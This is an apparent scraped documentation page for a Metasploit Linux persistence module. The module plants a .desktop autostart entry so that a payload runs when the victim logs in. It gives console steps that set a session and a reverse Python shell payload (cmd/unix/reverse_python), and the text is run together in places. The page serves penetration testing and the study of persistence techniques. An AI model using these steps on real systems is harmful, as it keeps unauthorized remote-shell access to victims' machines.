485 B
485 B
Autostart persistence
This module persist a payload by creating a .desktop entry for Linux desktop targets.
Testing
- Exploit a box
use exploit/linux/local/autostart_persistenceset SESSION <id>set PAYLOAD cmd/unix/reverse_python(for instance), configure the payload as neededexploit
When the victim logs in your payload will be executed!
Options
NAME
Name of the .desktop entry to add, if not specified it will be chosen randomly.